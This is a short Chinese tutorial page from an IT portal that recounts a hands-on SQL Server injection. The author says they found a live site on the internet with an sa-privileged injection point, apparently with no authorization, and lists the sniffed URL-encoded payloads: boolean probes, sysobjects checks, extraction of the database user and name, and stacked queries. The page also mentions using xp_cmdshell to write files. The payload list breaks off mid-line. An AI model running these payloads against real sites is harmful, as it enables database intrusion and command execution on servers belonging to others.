您现在的位置：IT之家 >> 学院>> 数据库开发教程>> SQL Server教程 >> 正文内容

同级栏目：
SQL Server教程 MySQL教程 Oracle教程 Access教程 DB2教程 Sybase教程 FoxPro教程

>内容阅读：

全面了解SQLServer注入过程实战经验分享

作者：来源：时间：2009年12月17日【字体：小大】

总的来说就是调用xp_cmdshell执行echo 一句句的写入文件。
【查询数据库信息】

本地没有找到好点的有注入漏洞的系统，只好在网上寻找了，先用Domain3.5，运行很好以来就找到个sqlserver，sa权限的注入点，点Domain3.5上面的“开始检测”www.it55.com

domain3.5_inj

以下是Domain3.5中嗅探出来的http数据包：
news_show.ASP?id=15618%20and%201=1
news_show.ASP?id=15618%20and%201=2
news_show.ASP?id=15618%20and%20exists%20(select%20*%20from%20sysobjects)
news_show.ASP?id=15618%20and%20char(124)%2Buser%2Bchar(124)=0
news_show.ASP?id=15618;declare%20@a%20int–
news_show.ASP?id=15618%20and%20char(124)%2Bdb_name()%2Bchar(1

Copyright © IT之家(Www.IT55.Com) Powered By 易网科技备案号：豫ICP备07012916号

本站QQ群：6614136 / 4218001 友情链接QQ：987950121